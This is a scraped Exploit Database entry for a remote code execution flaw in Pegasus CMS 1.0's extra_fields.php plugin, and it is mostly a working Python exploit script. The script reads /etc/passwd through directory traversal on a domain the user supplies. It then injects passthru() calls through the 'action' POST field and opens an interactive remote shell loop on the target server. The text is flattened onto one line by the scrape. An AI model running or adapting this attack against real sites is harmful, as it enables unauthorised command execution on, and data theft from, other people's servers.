Pegasus CMS 1.0 – ‘extra_fields.php’ Plugin Remote Code Execution

• Exploit Database
• 103 阅读

• 作者： R3zk0n
  日期： 2019-03-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46542/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109

  # Exploit Title: Pegasus extra_fields.php Plugin Remote Code Execution # Date: 14 March 2019 # Exploit Author: R3zk0n # Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms # Software Link: N/A # Version: 1.0 # Tested on: Linux # CVE : N/A   The Pegasus CMS is vulnerable to directory travaseral and Remote code execution due to the way the extra_fields.php plugin functions.   The Plugin can be exploited using the safer eval trick linked below http://justanotherhacker.com/2016/04/analysis_of_the_safer_eval_rce_aka__the_wahckon_bug.html to obtain remote code execution   Exploit attached below:   #Eval is secure.. not really. # These Greetz to people who are smart, Wireghoul, Nano, Silverly, m3mantra, and leostat. and z3al requests.packages.urllib3.disable_warnings() banner = &apos;&apos;&apos; Welcome to the DANGER ZONE. ;;J,ss,g,; ,s#@##"""77"^""77""@@Mw, ,#@#C7: ,, *^*@@@w ;@#7. ;#@#. ]ssmMMm#@@@m, ,##<code>,< ,@@@@Q ,,#@#*7</code> ;s@@@@@@@@@Q ;@#<code> ]@C;@@@@@@@@@@"\;@@@@@@@@@@@@@@@m @#\#@@w#@@@@@@@@@@#~ @@@#M5"7j5#@@@@@@@@Q ;@C @@@@@@@@@@@@@@#\@#\, *77@@@k ##. #@@@@@@@@@@@@@# &apos;*{@@@ @#</code>a@@@@@@@@@@@@@@L *%@@ {@*]@@@@@@@@@@@@@@#C*"@@ .@b;,s#@@@@@@@#@@#@@@@@@#C* ;s#@@@@@@m,j@b @@@#@@@@@@@@@@@@@@@@@@#C=*,ppJJs#@@@@@@@@@@@@@k @@ @#1@@@@@@@@@@@@@@@@#W~ ;@QQ@@@@@@@@@#<code> </code>|7@@@@~ ]@p @[ @@5"@@@@@@@@@@#~s@@@@@####@@@@@#\ @@@b ]@b @[@ j@@@@@@@@~]#"7"@@#"\7@@C @@@b ]@b @@ @@@@@@@@@@c ^@@ ]@,@@@#@@b @@~@ @@@@@@@@@@@b@#a@@@@"]@@ j@Q@@@@@@@@@@@@@@@@o,J]\s@@@@#"<code>]@@L ]@b ]@@@@@@@@@@@@@@@@o ,@@@@> ;@@@@@#^#@@# @@Q """%*577"%@@@@@@# ]@@@@@C;@@@@#C ;@@@#* %@m@@@@@@@.@@@@@#{@@@@@>s@@@@#* 7@@@@M@@@@@k ^@@@"# @@@@@@@@@@@@@@@# *@@m @@bj@@@b@@@o|"^]#%@@@@@@#M7@@#^ 7@@m "#@@# @@7@@@@@@~ ^||:</code>,#@#C ^%@@m j @b j# \@@@@@@ ,#@@# 7@@@mJ7&apos;|%@@@@@m, -g,ss#@@@@#C </code>7%@@@Mm, <code>7"%####@@MMMM#@@@#M7. ^7@@@@@@@@@@@@@@@@@@@@#MT^: </code>~^"7""""7^\*: Chimeria Exploit. pegausCMS Exploit&apos;s. &apos;&apos;&apos;     print banner     raw_url = raw_input("Please enter a domain name: \n")     def dir_Trav(raw_url): print "Checking for directory travseral..\n" dir_list = requests.get("https://www."+ raw_url + "/file/includes/template/inc/test.cgi?&filename=/../../../../../../../../etc/passwd", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close", "Cache-Control": "max-age=0"}) print dir_list.content return print "Trying to execute directory travseral" dir_Trav(raw_url) r = requests.get("http://" + raw_url) print "Checking Status code: %s" % r.status_code if r.status_code == 200: print "Connected" print "Checking is using vulnerable CMS." vuln = "http://" + raw_url + "/file/includes/plugins/globalFields/submit.php" b = requests.get("http://" + raw_url + "/file/includes/plugins/globalFields/submit.php") print "Checking CMS Status: %s " % b.status_code if b.status_code == 200: print "Seems exploitable.. Lets try to list the files!"       print raw_url list_files = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru(\"ls -lah\");exit;phpinfo"}) print list_files.content status = list_files.status_code while status == 200: try: ShellCheck = raw_input("Shell>").strip()   Shell = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru(\"{}\");exit;phpinfo".format(ShellCheck)})   print Shell.content if ShellCheck == "exit": sys.exit(0) except KeyboardInterrupt: print "Your exited bye" sys.exit(0)   else: print "Connected but does not seem exploitable. \n" print "Bye!!!!!!!!!! \n"         else: print "Not connected"